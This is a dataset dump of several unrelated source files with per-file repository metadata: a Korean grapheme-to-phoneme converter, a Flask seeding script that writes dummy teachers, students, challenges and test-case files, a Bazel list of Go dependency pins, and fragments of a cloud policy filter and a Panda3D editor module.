- type: parent
filter:
type: value
key: tags.owner
value: ProjectA
"""
schema = type_schema(
'parent', filter={'type': 'object'}, required=['type'])
schema_alias = True
def __init__(self, data, manager=None):
super(ParentFilter, self).__init__(data, manager)
self.parent_manager = self.manager.get_parent_manager()
self.parent_filter = self.parent_manager.filter_registry.factory(
self.data['filter'],
self.parent_manager)
def process(self, resources, event=None):
parent_resources = self.parent_filter.process(self.parent_manager.resources())
parent_resources_ids = [p['id'] for p in parent_resources]
parent_key = self.manager.resource_type.parent_key
return [r for r in resources if r[parent_key] in parent_resources_ids]
| 34.545366 | 103 | 0.599311 |
5c0911ddfce99df154bd26199c4c7570917b900c | 8,183 | py | Python | text/g2p2_demo.py | DSAIL-SKKU/GST-Tacotron | 07f1c5d2fc8b2f2dcdd8f145b184887b35b5b0d9 | [
"MIT"
] | 2 | 2020-04-16T12:00:53.000Z | 2020-04-22T18:59:35.000Z | text/g2p2_demo.py | DSAIL-SKKU/GST-Tacotron | 07f1c5d2fc8b2f2dcdd8f145b184887b35b5b0d9 | [
"MIT"
] | null | null | null | text/g2p2_demo.py | DSAIL-SKKU/GST-Tacotron | 07f1c5d2fc8b2f2dcdd8f145b184887b35b5b0d9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
g2p.py
~~~~~~~~~~
This script converts Korean graphemes to romanized phones and then to pronunciation.
(1) graph2phone: convert Korean graphemes to romanized phones
(2) phone2prono: convert romanized phones to pronunciation
(3) graph2phone: convert Korean graphemes to pronunciation
Usage: $ python g2p.py '스물 여덟째 사람'
(NB. Please check 'rulebook_path' before usage.)
Yejin Cho (scarletcho@gmail.com)
Jaegu Kang (jaekoo.jk@gmail.com)
Hyungwon Yang (hyung8758@gmail.com)
Yeonjung Hong (yvonne.yj.hong@gmail.com)
Created: 2016-08-11
Last updated: 2017-02-22 Yejin Cho
* Key updates made:
- Executable in both Python 2 and 3.
- G2P Performance test available ($ python g2p.py test)
- G2P verbosity control available
'''
import datetime as dt
import re
import math
import sys
# import optparse
import argparse
def readfileUTF8(fname):
f = open(fname, 'r')
corpus = []
while True:
line = f.readline()
line = line.encode("utf-8")
line = re.sub(u'\n', u'', line)
if line != u'':
corpus.append(line)
if not line: break
f.close()
return corpus
def writefile(body, fname):
out = open(fname, 'w')
for line in body:
out.write('{}\n'.format(line))
out.close()
def readRules(pver, rule_book):
if pver == 2:
f = open(rule_book, 'r')
elif pver == 3:
f = open(rule_book, 'r',encoding="utf-8")
rule_in = []
rule_out = []
while True:
line = f.readline()
if pver == 2:
line = unicode(line.encode("utf-8"))
line = re.sub(u'\n', u'', line)
elif pver == 3:
line = re.sub('\n', '', line)
if line != u'':
if line[0] != u'#':
IOlist = line.split('\t')
rule_in.append(IOlist[0])
if IOlist[1]:
rule_out.append(IOlist[1])
else: # If output is empty (i.e. deletion rule)
rule_out.append(u'')
if not line: break
f.close()
return rule_in, rule_out
def isHangul(charint):
hangul_init = 44032
hangul_fin = 55203
return charint >= hangul_init and charint <= hangul_fin
def checkCharType(var_list):
# 1: whitespace
# 0: hangul
# -1: non-hangul
checked = []
for i in range(len(var_list)):
if var_list[i] == 32: # whitespace
checked.append(1)
elif isHangul(var_list[i]): # Hangul character
checked.append(0)
else: # Non-hangul character
checked.append(-1)
return checked
def graph2phone(graphs):
# Encode graphemes as utf8
try:
graphs = graphs.decode('utf8')
except AttributeError:
pass
#print("A >> %s", graphs)
integers = []
for i in range(len(graphs)):
integers.append(ord(graphs[i]))
# Romanization (according to Korean Spontaneous Speech corpus; 성인자유발화코퍼스)
phones = ''
ONS = ['k0', 'kk', 'nn', 't0', 'tt', 'rr', 'mm', 'p0', 'pp',
's0', 'ss', 'oh', 'c0', 'cc', 'ch', 'kh', 'th', 'ph', 'h0']
NUC = ['aa', 'qq', 'ya', 'yq', 'vv', 'ee', 'yv', 'ye', 'oo', 'wa',
'wq', 'wo', 'yo', 'uu', 'wv', 'we', 'wi', 'yu', 'xx', 'xi', 'ii']
COD = ['', 'kf', 'kk', 'ks', 'nf', 'nc', 'nh', 'tf',
'll', 'lk', 'lm', 'lb', 'ls', 'lt', 'lp', 'lh',
'mf', 'pf', 'ps', 's0', 'ss', 'oh', 'c0', 'ch',
'kh', 'th', 'ph', 'h0']
# Pronunciation
idx = checkCharType(integers)
iElement = 0
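    # Hangul syllables are decomposed arithmetically: every precomposed syllable is
    # U+AC00 (44032) + (onset_index * 588) + (nucleus_index * 28) + coda_index,
    # since there are 21 nuclei and 28 coda slots (588 = 21 * 28).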
while iElement < len(integers):
if idx[iElement] == 0: # not space characters
base = 44032
df = int(integers[iElement]) - base
iONS = int(math.floor(df / 588)) + 1
iNUC = int(math.floor((df % 588) / 28)) + 1
iCOD = int((df % 588) % 28) + 1
s1 = '-' + ONS[iONS - 1] # onset
s2 = NUC[iNUC - 1] # nucleus
if COD[iCOD - 1]: # coda
s3 = COD[iCOD - 1]
else:
s3 = ''
tmp = s1 + s2 + s3
phones = phones + tmp
elif idx[iElement] == 1: # space character
# tmp = '#'
tmp = 'zz'
phones = phones + tmp
phones = re.sub('-(oh)', '-', phones)
iElement += 1
tmp = ''
# print("B >> %s" % phones)
    # Delete the syllable-initial 'ㅇ' (ieung): drop the placeholder onset 'oh'
phones = re.sub('^oh', '', phones)
# print("C >> %s" % phones)
phones = re.sub('-(oh)', '', phones)
# print("D >> %s" % phones)
    # Treat coda 'ㅇ' (ieung) as 'ng' (velar nasal in coda position)
phones = re.sub('oh-', 'ng-', phones)
#print("D2 >> %s" % phones)
#phones = re.sub('oh([# ]|$)', 'ng', phones)
#phones = re.sub('oh([zz ]|$)', 'ng', phones)
phones = re.sub(u'ohzz', 'ngzz', phones)
phones = re.sub('oh$', 'ng', phones)
#print("E >> %s" % phones)
## Remove all characters except Hangul and syllable delimiter (hyphen; '-')
phones = re.sub('(\W+)\-', '\\1', phones)
phones = re.sub('\W+$', '', phones)
phones = re.sub('^\-', '', phones)
#print("F >> %s" % phones)
return phones
def phone2prono(phones, rule_in, rule_out):
# Apply g2p rules
for pattern, replacement in zip(rule_in, rule_out):
# print pattern
phones = re.sub(pattern, replacement, phones)
prono = phones
return prono
def addPhoneBoundary(phones):
# Add a comma (,) after every second alphabets to mark phone boundaries
ipos = 0
newphones = ''
while ipos + 2 <= len(phones):
if phones[ipos] == u'-':
newphones = newphones + phones[ipos]
ipos += 1
elif phones[ipos] == u' ':
ipos += 1
elif phones[ipos] == u'#':
newphones = newphones + phones[ipos]
ipos += 1
newphones = newphones + phones[ipos] + phones[ipos+1] + u','
ipos += 2
return newphones
def addSpace(phones):
ipos = 0
newphones = ''
while ipos < len(phones):
if ipos == 0:
newphones = newphones + phones[ipos] + phones[ipos + 1]
else:
newphones = newphones + ' ' + phones[ipos] + phones[ipos + 1]
ipos += 2
return newphones
def graph2prono(graphs, rule_in, rule_out):
romanized = graph2phone(graphs)
#print("1 [%s]"%romanized)
romanized_bd = addPhoneBoundary(romanized)
#print("2 [%s]"%romanized_bd)
prono = phone2prono(romanized_bd, rule_in, rule_out)
#print("3 [%s]"%prono)
prono = re.sub(u',', u' ', prono)
#print("4 [%s]"%prono)
prono = re.sub(u' $', u'', prono)
#print("5 [%s]"%prono)
prono = re.sub(u'#', u'-', prono)
#print("6 [%s]"%prono)
prono = re.sub(u'-+', u'-', prono)
#print("7 [%s]"%prono)
prono_prev = prono
identical = False
loop_cnt = 1
while not identical:
prono_new = phone2prono(re.sub(u' ', u',', prono_prev + u','), rule_in, rule_out)
prono_new = re.sub(u',', u' ', prono_new)
prono_new = re.sub(u' $', u'', prono_new)
if re.sub(u'-', u'', prono_prev) == re.sub(u'-', u'', prono_new):
identical = True
prono_new = re.sub(u'-', u'', prono_new)
else:
loop_cnt += 1
prono_prev = prono_new
return prono_new
def runKoG2PTest(graph, rulebook):
[rule_in, rule_out] = readRules(3, rulebook)
# if ver_info[0] == 2:
# prono = graph2prono(unicode(graph), rule_in, rule_out)
# elif ver_info[0] == 3:
prono = graph2prono(graph, rule_in, rule_out)
return prono
def makeTestData():
for line in sys.stdin:
print(line)
print(runKoG2PTest(line, 'text/rulebook.txt'))
def makeMetaData():
for line in sys.stdin:
l = line.split('|')
prefix = l[0]
content = l[1]
words = content.split(' ')
converted = ''
for x in range(len(words) - 1):
converted = converted + runKoG2PTest(words[x], 'rulebook.txt') + ' '
converted = converted + runKoG2PTest(words[len(words) - 1], 'rulebook.txt')
print("%s|%s" %(prefix, converted))
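# Illustrative entry point (a sketch, not part of the original script): mirrors the
# docstring usage `$ python g2p.py '스물 여덟째 사람'`, assuming rulebook.txt sits in the
# working directory, as makeMetaData() above already expects.
if __name__ == '__main__':
    if len(sys.argv) > 1:
        print(runKoG2PTest(sys.argv[1], 'rulebook.txt'))
    else:
        makeTestData()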
| 28.217241 | 89 | 0.527802 |
a08e96ad6005a1a828ac587ed4726db01ce6eca3 | 8,136 | py | Python | modelsDummyData.py | Rahul-RB/titanium-silver | 7d62e194e26adf15e26f6a84cbfc454cf5db5a7e | [
"MIT"
] | 1 | 2019-09-13T18:55:43.000Z | 2019-09-13T18:55:43.000Z | modelsDummyData.py | Rahul-RB/titanium-silver | 7d62e194e26adf15e26f6a84cbfc454cf5db5a7e | [
"MIT"
] | 1 | 2019-04-22T15:49:49.000Z | 2019-04-22T15:49:50.000Z | modelsDummyData.py | Rahul-RB/titanium-silver | 7d62e194e26adf15e26f6a84cbfc454cf5db5a7e | [
"MIT"
] | null | null | null | import argparse
import os
from server.flaskr import db
from server.flaskr.models import models
from uuid import uuid4
parser = argparse.ArgumentParser()
parser.add_argument("--dir",
help="Enter project root directory,\n\
eg if titanium_silver is in: /home/rahul/, enter /home/rahul/\n\
If you are already in the project dir, then give ..",
type=str,
required=True
)
args = parser.parse_args()
rootDir = os.path.abspath(args.dir)
inputDir = rootDir+"/titanium-silver/server/flaskr/codes/Input/"
outputDir = rootDir+"/titanium-silver/server/flaskr/codes/Output/"
testCaseDir = rootDir+"/titanium-silver/server/flaskr/codes/TestCases/"
expectedOutputDir = rootDir+"/titanium-silver/server/flaskr/codes/ExpectedOutputs/"
teacher_id = "01TI15ECS001"
t1 = models.Teacher(
ID=teacher_id,
name="Teacher 1",
designation="Asst Prof",
username="teacher1@teachers.com",
password="teacher1",
noOfChallenges=0
)
student_id = "01FB15ECS104"
s1 = models.Student(
ID=student_id,
name="Student 1",
semester="6th",
username="student1@students.com",
password="student1",
noOfChallenges=0
)
# c1uuid = str(uuid4().hex)
c1uuid = "c1"
c1 = models.Challenge(
ID=c1uuid,
teacherID=teacher_id,
status="INACTIVE",
timeLimitHrs=2,
timeLimitMins=30
)
# q1uuid = str(uuid4().hex)
q1uuid = "q1"
q1 = models.Question(
ID=q1uuid,
name="This is question 1",
CPU="2GHz",
memory="128m"
)
# q2uuid = str(uuid4().hex)
q2uuid = "q2"
q2 = models.Question(
ID=q2uuid,
name="This is question 2",
CPU="1GHz",
memory="128m"
)
# q3uuid = str(uuid4().hex)
q3uuid = "q3"
q3 = models.Question(
ID=q3uuid,
name="This is question 3",
CPU="1.5GHz",
memory="128m"
)
q1l = models.QuestionAndLanguage(
qID=q1uuid,
C=True,
CPP=False,
Python=True,
Python3=False,
Ruby=True,
PHP5x=False,
PHP7x=False,
Java=False
)
q2l = models.QuestionAndLanguage(
qID=q2uuid,
C=False,
CPP=True,
Python=True,
Python3=False,
Ruby=False,
PHP5x=False,
PHP7x=False,
Java=False
)
q3l = models.QuestionAndLanguage(
qID=q3uuid,
C=False,
CPP=False,
Python=True,
Python3=True,
Ruby=False,
PHP5x=False,
PHP7x=False,
Java=True
)
# t1_1uuid = str(uuid4().hex)
t1_1uuid = "t1_1"
t1_1 = models.TestCase(
ID=t1_1uuid,
testCasePath="TestCases/"+t1_1uuid,
expectedOutputPath="ExpectedOutputs/"+t1_1uuid
)
# t1_2uuid = str(uuid4().hex)
t1_2uuid = "t1_2"
t1_2 = models.TestCase(
ID=t1_2uuid,
testCasePath="TestCases/"+t1_2uuid,
expectedOutputPath="ExpectedOutputs/"+t1_2uuid
)
# t1_3uuid = str(uuid4().hex)
t1_3uuid = "t1_3"
t1_3 = models.TestCase(
ID=t1_3uuid,
testCasePath="TestCases/"+t1_3uuid,
expectedOutputPath="ExpectedOutputs/"+t1_3uuid
)
# t2uuid = str(uuid4().hex)
t2uuid = "t2"
t2 = models.TestCase(
ID=t2uuid,
testCasePath="TestCases/"+t2uuid,
expectedOutputPath="ExpectedOutputs/"+t2uuid
)
# t3uuid = str(uuid4().hex)
t3uuid = "t3"
t3 = models.TestCase(
ID=t3uuid,
testCasePath="TestCases/"+t3uuid,
expectedOutputPath="ExpectedOutputs/"+t3uuid
)
# t4uuid = str(uuid4().hex)
t4uuid = "t4"
t4 = models.TestCase(
ID=t4uuid,
testCasePath="TestCases/"+t4uuid,
expectedOutputPath="ExpectedOutputs/"+t4uuid
)
# t5uuid = str(uuid4().hex)
t5uuid = "t5"
t5 = models.TestCase(
ID=t5uuid,
testCasePath="TestCases/"+t5uuid,
expectedOutputPath="ExpectedOutputs/"+t5uuid
)
# t6uuid = str(uuid4().hex)
t6uuid = "t6"
t6 = models.TestCase(
ID=t6uuid,
testCasePath="TestCases/"+t6uuid,
expectedOutputPath="ExpectedOutputs/"+t6uuid
)
cq1 = models.ChallengeAndQuestion(
cID=c1uuid,
qID=q1uuid
)
cq2 = models.ChallengeAndQuestion(
cID=c1uuid,
qID=q2uuid
)
cq3 = models.ChallengeAndQuestion(
cID=c1uuid,
qID=q3uuid
)
qt1_1 = models.QuestionAndTestCase(
qID=q1uuid,
tID=t1_1uuid
)
qt1_2 = models.QuestionAndTestCase(
qID=q1uuid,
tID=t1_2uuid
)
qt1_3 = models.QuestionAndTestCase(
qID=q1uuid,
tID=t1_3uuid
)
qt2 = models.QuestionAndTestCase(
qID=q1uuid,
tID=t2uuid
)
qt3 = models.QuestionAndTestCase(
qID=q2uuid,
tID=t3uuid
)
qt4 = models.QuestionAndTestCase(
qID=q2uuid,
tID=t4uuid
)
qt5 = models.QuestionAndTestCase(
qID=q2uuid,
tID=t5uuid
)
qt6 = models.QuestionAndTestCase(
qID=q3uuid,
tID=t6uuid
)
cs1 = models.ChallengeAndStudent(
cID=c1uuid,
sID=student_id
)
sub1 = models.Submission(
sID=student_id,
cID=c1uuid,
qID=q1uuid,
codeFilePath=inputDir+student_id+"_"+q1uuid+".c",
compilePass=True,
progLang="C"
)
sub2 = models.Submission(
sID=student_id,
cID=c1uuid,
qID=q2uuid,
codeFilePath=inputDir+student_id+"_"+q2uuid+".cpp",
compilePass=False,
progLang="Python3"
)
sub3 = models.Submission(
sID=student_id,
cID=c1uuid,
qID=q3uuid,
codeFilePath=inputDir+student_id+"_"+q3uuid+".py",
compilePass=True,
progLang="Python"
)
subRes1 = models.SubmissionResult(
sID=student_id,
cID=c1uuid,
qID=q1uuid,
tID=t1_1uuid,
testPass=False
)
subRes2 = models.SubmissionResult(
sID=student_id,
cID=c1uuid,
qID=q1uuid,
tID=t2uuid,
testPass=True
)
subRes3 = models.SubmissionResult(
sID=student_id,
cID=c1uuid,
qID=q3uuid,
tID=t6uuid,
testPass=True
)
# Make Test case and Expected Output files
t1_1uuid_tc_path = testCaseDir+t1_1uuid
t1_2uuid_tc_path = testCaseDir+t1_2uuid
t1_3uuid_tc_path = testCaseDir+t1_3uuid
t2uuid_tc_path = testCaseDir+t2uuid
t3uuid_tc_path = testCaseDir+t3uuid
t4uuid_tc_path = testCaseDir+t4uuid
t5uuid_tc_path = testCaseDir+t5uuid
t6uuid_tc_path = testCaseDir+t6uuid
with open(t1_1uuid_tc_path,"w") as fp:
fp.write("t1_1")
with open(t1_2uuid_tc_path,"w") as fp:
fp.write("t1_2")
with open(t1_3uuid_tc_path,"w") as fp:
fp.write("t1_3")
with open(t2uuid_tc_path,"w") as fp:
fp.write("t2")
with open(t3uuid_tc_path,"w") as fp:
fp.write("t3")
with open(t4uuid_tc_path,"w") as fp:
fp.write("t4")
with open(t5uuid_tc_path,"w") as fp:
fp.write("t5")
with open(t6uuid_tc_path,"w") as fp:
fp.write("t6")
t1_1uuid_ex_path = expectedOutputDir+t1_1uuid
t1_2uuid_ex_path = expectedOutputDir+t1_2uuid
t1_3uuid_ex_path = expectedOutputDir+t1_3uuid
t2uuid_ex_path = expectedOutputDir+t2uuid
t3uuid_ex_path = expectedOutputDir+t3uuid
t4uuid_ex_path = expectedOutputDir+t4uuid
t5uuid_ex_path = expectedOutputDir+t5uuid
t6uuid_ex_path = expectedOutputDir+t6uuid
with open(t1_1uuid_ex_path,"w") as fp:
fp.write("et1_1")
with open(t1_2uuid_ex_path,"w") as fp:
fp.write("et1_2")
with open(t1_3uuid_ex_path,"w") as fp:
fp.write("et1_3")
with open(t2uuid_ex_path,"w") as fp:
fp.write("et2")
with open(t3uuid_ex_path,"w") as fp:
fp.write("et3")
with open(t4uuid_ex_path,"w") as fp:
fp.write("et4")
with open(t5uuid_ex_path,"w") as fp:
fp.write("et5")
with open(t6uuid_ex_path,"w") as fp:
fp.write("et6")
# Submission files
p1 = inputDir+student_id+"_"+q1uuid+".c"
p2 = inputDir+student_id+"_"+q2uuid+".cpp"
p3 = inputDir+student_id+"_"+q3uuid+".py"
with open(p1,"w") as fp:
fp.write("""
#include<stdio.h>
int main(){
        printf("%s\\n", "The C file");
}
""")
fp.close()
with open(p2,"w") as fp:
fp.write("""
#include<iostream>
using namespace std;
int main(){
cout<<"The C++ file";
}
""")
fp.close()
with open(p3,"w") as fp:
fp.write("""
print("The Python file")
""")
fp.close()
db.create_all()
db.session.add(t1)
db.session.add(s1)
db.session.add(c1)
db.session.add(q1)
db.session.add(q2)
db.session.add(q3)
db.session.add(q1l)
db.session.add(q2l)
db.session.add(q3l)
db.session.add(t1_1)
db.session.add(t1_2)
db.session.add(t1_3)
db.session.add(t2)
db.session.add(t3)
db.session.add(t4)
db.session.add(t5)
db.session.add(t6)
db.session.add(cq1)
db.session.add(cs1)
db.session.add(cq2)
db.session.add(cq3)
db.session.add(qt1_1)
db.session.add(qt1_2)
db.session.add(qt1_3)
db.session.add(qt2)
db.session.add(qt3)
db.session.add(qt4)
db.session.add(qt5)
db.session.add(qt6)
#db.session.add(sub1)
#db.session.add(sub2)
#db.session.add(sub3)
#db.session.add(subRes1)
#db.session.add(subRes2)
#db.session.add(subRes3)
db.session.commit()
| 19.417661 | 83 | 0.703663 |
2886242a2051a35fb9cd2ab4ef0604e1b510a8ef | 6,780 | bzl | Python | repositories.bzl | wtzenb/grpc-gateway | d88f9573560a91d26e759852a849e525bf2ec31f | [
"BSD-3-Clause"
] | null | null | null | repositories.bzl | wtzenb/grpc-gateway | d88f9573560a91d26e759852a849e525bf2ec31f | [
"BSD-3-Clause"
] | 7 | 2021-05-11T15:39:59.000Z | 2022-03-02T08:50:30.000Z | api/grpc-gateway/repositories.bzl | chrispaynes/GatewayTodo | 8b775bd4bfe00a6b23014f1b910f3f2cf82e2526 | [
"MIT"
] | null | null | null | load("@bazel_gazelle//:deps.bzl", "go_repository")
def go_repositories():
go_repository(
name = "co_honnef_go_tools",
importpath = "honnef.co/go/tools",
sum = "h1:/hemPrYIhOhy8zYrNj+069zDB68us2sMGsfkFJO0iZs=",
version = "v0.0.0-20190523083050-ea95bdfd59fc",
)
go_repository(
name = "com_github_burntsushi_toml",
importpath = "github.com/BurntSushi/toml",
sum = "h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=",
version = "v0.3.1",
)
go_repository(
name = "com_github_client9_misspell",
importpath = "github.com/client9/misspell",
sum = "h1:ta993UF76GwbvJcIo3Y68y/M3WxlpEHPWIGDkJYwzJI=",
version = "v0.3.4",
)
go_repository(
name = "com_github_ghodss_yaml",
importpath = "github.com/ghodss/yaml",
sum = "h1:wQHKEahhL6wmXdzwWG11gIVCkOv05bNOh+Rxn0yngAk=",
version = "v1.0.0",
)
go_repository(
name = "com_github_golang_glog",
importpath = "github.com/golang/glog",
sum = "h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58=",
version = "v0.0.0-20160126235308-23def4e6c14b",
)
go_repository(
name = "com_github_golang_mock",
importpath = "github.com/golang/mock",
sum = "h1:G5FRp8JnTd7RQH5kemVNlMeyXQAztQ3mOWV95KxsXH8=",
version = "v1.1.1",
)
go_repository(
name = "com_github_golang_protobuf",
importpath = "github.com/golang/protobuf",
sum = "h1:gyjaxf+svBWX08ZjK86iN9geUJF0H6gp2IRKX6Nf6/I=",
version = "v1.3.3",
)
go_repository(
name = "com_github_rogpeppe_fastuuid",
importpath = "github.com/rogpeppe/fastuuid",
sum = "h1:Ppwyp6VYCF1nvBTXL3trRso7mXMlRrw9ooo375wvi2s=",
version = "v1.2.0",
)
go_repository(
name = "com_google_cloud_go",
importpath = "cloud.google.com/go",
sum = "h1:eOI3/cP2VTU6uZLDYAoic+eyzzB9YyGmJ7eIjl8rOPg=",
version = "v0.34.0",
)
go_repository(
name = "in_gopkg_check_v1",
importpath = "gopkg.in/check.v1",
sum = "h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=",
version = "v0.0.0-20161208181325-20d25e280405",
)
go_repository(
name = "in_gopkg_yaml_v2",
importpath = "gopkg.in/yaml.v2",
sum = "h1:fvjTMHxHEw/mxHbtzPi3JCcKXQRAnQTBRo6YCJSVHKI=",
version = "v2.2.3",
)
go_repository(
name = "org_golang_google_appengine",
importpath = "google.golang.org/appengine",
sum = "h1:/wp5JvzpHIxhs/dumFmF7BXTf3Z+dd4uXta4kVyO508=",
version = "v1.4.0",
)
go_repository(
name = "org_golang_google_genproto",
importpath = "google.golang.org/genproto",
sum = "h1:Bz1qTn2YRWV+9OKJtxHJiQKCiXIdf+kwuKXdt9cBxyU=",
version = "v0.0.0-20200507105951-43844f6eee31",
)
go_repository(
name = "org_golang_google_grpc",
importpath = "google.golang.org/grpc",
sum = "h1:EC2SB8S04d2r73uptxphDSUG+kTKVgjRPF+N3xpxRB4=",
version = "v1.29.1",
)
go_repository(
name = "org_golang_x_lint",
importpath = "golang.org/x/lint",
sum = "h1:XQyxROzUlZH+WIQwySDgnISgOivlhjIEwaQaJEJrrN0=",
version = "v0.0.0-20190313153728-d0100b6bd8b3",
)
go_repository(
name = "org_golang_x_net",
importpath = "golang.org/x/net",
sum = "h1:2mqDk8w/o6UmeUCu5Qiq2y7iMf6anbx+YA8d1JFoFrs=",
version = "v0.0.0-20191002035440-2ec189313ef0",
)
go_repository(
name = "org_golang_x_oauth2",
importpath = "golang.org/x/oauth2",
sum = "h1:TzXSXBo42m9gQenoE3b9BGiEpg5IG2JkU5FkPIawgtw=",
version = "v0.0.0-20200107190931-bf48bf16ab8d",
)
go_repository(
name = "org_golang_x_sync",
importpath = "golang.org/x/sync",
sum = "h1:8gQV6CLnAEikrhgkHFbMAEhagSSnXWGV915qUMm9mrU=",
version = "v0.0.0-20190423024810-112230192c58",
)
go_repository(
name = "org_golang_x_sys",
importpath = "golang.org/x/sys",
sum = "h1:1BGLXjeY4akVXGgbC9HugT3Jv3hCI0z56oJR5vAMgBU=",
version = "v0.0.0-20190215142949-d0b11bdaac8a",
)
go_repository(
name = "org_golang_x_text",
importpath = "golang.org/x/text",
sum = "h1:g61tztE5qeGQ89tm6NTjjM9VPIm088od1l6aSorWRWg=",
version = "v0.3.0",
)
go_repository(
name = "org_golang_x_tools",
importpath = "golang.org/x/tools",
sum = "h1:5Beo0mZN8dRzgrMMkDp0jc8YXQKx9DiJ2k1dkvGsn5A=",
version = "v0.0.0-20190524140312-2c0ae7006135",
)
go_repository(
name = "com_github_google_go_cmp",
importpath = "github.com/google/go-cmp",
sum = "h1:+dTQ8DZQJz0Mb/HjFlkptS1FeQ4cWSnN941F8aEG4SQ=",
version = "v0.2.0",
)
go_repository(
name = "org_golang_x_crypto",
importpath = "golang.org/x/crypto",
sum = "h1:VklqNMn3ovrHsnt90PveolxSbWFaJdECFbxSq0Mqo2M=",
version = "v0.0.0-20190308221718-c2843e01d9a2",
)
go_repository(
name = "org_golang_x_exp",
importpath = "golang.org/x/exp",
sum = "h1:c2HOrn5iMezYjSlGPncknSEr/8x5LELb/ilJbXi9DEA=",
version = "v0.0.0-20190121172915-509febef88a4",
)
go_repository(
name = "com_github_antihax_optional",
importpath = "github.com/antihax/optional",
sum = "h1:uZuxRZCz65cG1o6K/xUqImNcYKtmk9ylqaH0itMSvzA=",
version = "v0.0.0-20180407024304-ca021399b1a6",
)
go_repository(
name = "com_github_census_instrumentation_opencensus_proto",
importpath = "github.com/census-instrumentation/opencensus-proto",
sum = "h1:glEXhBS5PSLLv4IXzLA5yPRVX4bilULVyxxbrfOtDAk=",
version = "v0.2.1",
)
go_repository(
name = "com_github_envoyproxy_go_control_plane",
importpath = "github.com/envoyproxy/go-control-plane",
sum = "h1:rEvIZUSZ3fx39WIi3JkQqQBitGwpELBIYWeBVh6wn+E=",
version = "v0.9.4",
)
go_repository(
name = "com_github_envoyproxy_protoc_gen_validate",
importpath = "github.com/envoyproxy/protoc-gen-validate",
sum = "h1:EQciDnbrYxy13PgWoY8AqoxGiPrpgBZ1R8UNe3ddc+A=",
version = "v0.1.0",
)
go_repository(
name = "com_github_prometheus_client_model",
importpath = "github.com/prometheus/client_model",
sum = "h1:gQz4mCbXsO+nc9n1hCxHcGA3Zx3Eo+UHZoInFGUIXNM=",
version = "v0.0.0-20190812154241-14fe0d1b01d4",
)
go_repository(
name = "com_github_cncf_udpa_go",
importpath = "github.com/cncf/udpa/go",
sum = "h1:WBZRG4aNOuI15bLRrCgN8fCq8E5Xuty6jGbmSNEvSsU=",
version = "v0.0.0-20191209042840-269d4d468f6f",
)
| 36.256684 | 74 | 0.637021 |
09c83abf2349aeb0416fa9cd05503084cc409876 | 3,112 | py | Python | ts_utils/matrix.py | devjeetr/ts_utils | a8bc65ca28be7bbf9ef9ba9509325194aefb1c3a | [
"Apache-2.0"
] | 2 | 2021-12-21T02:49:52.000Z | 2022-03-07T19:40:55.000Z | ts_utils/matrix.py | devjeetr/ts_utils | a8bc65ca28be7bbf9ef9ba9509325194aefb1c3a | [
"Apache-2.0"
] | 1 | 2022-03-07T19:56:24.000Z | 2022-03-07T19:56:24.000Z | ts_utils/matrix.py | devjeetr/ts_utils | a8bc65ca28be7bbf9ef9ba9509325194aefb1c3a | [
"Apache-2.0"
] | null | null | null | """Contains utilities to convert tree_sitter
trees into scipy sparse matrices.
"""
from typing import Tuple
from scipy.sparse import coo_matrix
from tree_sitter import Node, TreeCursor
from ts_utils.core import hash_node
from ts_utils.iter import (TraversalFilter, default_traversal_filter,
iternodes, iternodes_with_parent)
NodesById = dict[int, Tuple[int, Node]]
__all__ = ["parent_mask", "next_sibling_mask", "prev_sibling_mask"]
def parent_mask(cursor: TreeCursor,
nodes: NodesById = None,
traversal_filter: TraversalFilter = default_traversal_filter):
"""Returns a sparse boolean matrix representing an adjacency
matrix of the tree rooted at cursor
"""
if not nodes:
nodes = {
hash_node(node): (i, node)
for i, node in enumerate(
iternodes(cursor, traversal_filter=traversal_filter))
}
data = []
rows = []
cols = []
for node, parent in iternodes_with_parent(
cursor, traversal_filter=traversal_filter):
if parent:
parent_id = nodes[hash_node(parent)][0]
node_id = nodes[hash_node(node)][0]
data.append(1)
rows.append(parent_id)
cols.append(node_id)
return coo_matrix((data, (rows, cols)),
dtype=bool,
shape=(len(nodes), len(nodes)))
def next_sibling_mask(
cursor,
nodes=None,
traversal_filter: TraversalFilter = default_traversal_filter):
if not nodes:
nodes = {
hash_node(node): (i, node)
for i, node in enumerate(
iternodes(cursor, traversal_filter=traversal_filter))
}
data = []
rows = []
cols = []
for node in iternodes(cursor, traversal_filter=traversal_filter):
curr = node
node_id = nodes[hash_node(node)][0]
while curr := curr.next_sibling:
            sibling_id = nodes[hash_node(curr)][0]
data.append(1)
rows.append(node_id)
cols.append(sibling_id)
return coo_matrix((data, (rows, cols)),
dtype=bool,
shape=(len(nodes), len(nodes)))
def prev_sibling_mask(
cursor,
nodes=None,
traversal_filter: TraversalFilter = default_traversal_filter):
if not nodes:
nodes = {
hash_node(node): (i, node)
for i, node in enumerate(
iternodes(cursor, traversal_filter=traversal_filter))
}
data = []
rows = []
cols = []
for node in iternodes(cursor, traversal_filter=traversal_filter):
curr = node
node_id = nodes[hash_node(node)][0]
while curr := curr.prev_sibling:
            sibling_id = nodes[hash_node(curr)][0]
data.append(1)
rows.append(node_id)
cols.append(sibling_id)
return coo_matrix((data, (rows, cols)),
dtype=bool,
shape=(len(nodes), len(nodes)))
sparse_adjacency_matrix = parent_mask
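# Illustrative usage sketch (assumes a compiled tree_sitter Language object is available
# as PY_LANGUAGE; that name is an assumption, not part of this module):
#
#   from tree_sitter import Parser
#   parser = Parser()
#   parser.set_language(PY_LANGUAGE)
#   tree = parser.parse(b"def f(x):\n    return x\n")
#   adjacency = parent_mask(tree.walk())   # scipy.sparse.coo_matrix, dtype=bool
#   print(adjacency.toarray())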
| 28.550459 | 78 | 0.586761 |
4b76cb8879031e86d03c4c1c64c854270900ddaf | 25,132 | py | Python | dependencies/panda/direct/leveleditor/ObjectPropertyUI.py | SuperM0use24/Project-Altis | 8dec7518a4d3f902cee261fd522ebebc3c171a42 | [
"Apache-2.0"
] | null | null | null | dependencies/panda/direct/leveleditor/ObjectPropertyUI.py | SuperM0use24/Project-Altis | 8dec7518a4d3f902cee261fd522ebebc3c171a42 | [
"Apache-2.0"
] | null | null | null | dependencies/panda/direct/leveleditor/ObjectPropertyUI.py | SuperM0use24/Project-Altis | 8dec7518a4d3f902cee261fd522ebebc3c171a42 | [
"Apache-2.0"
] | null | null | null | """
UI for object property control
"""
import wx
import os
import math
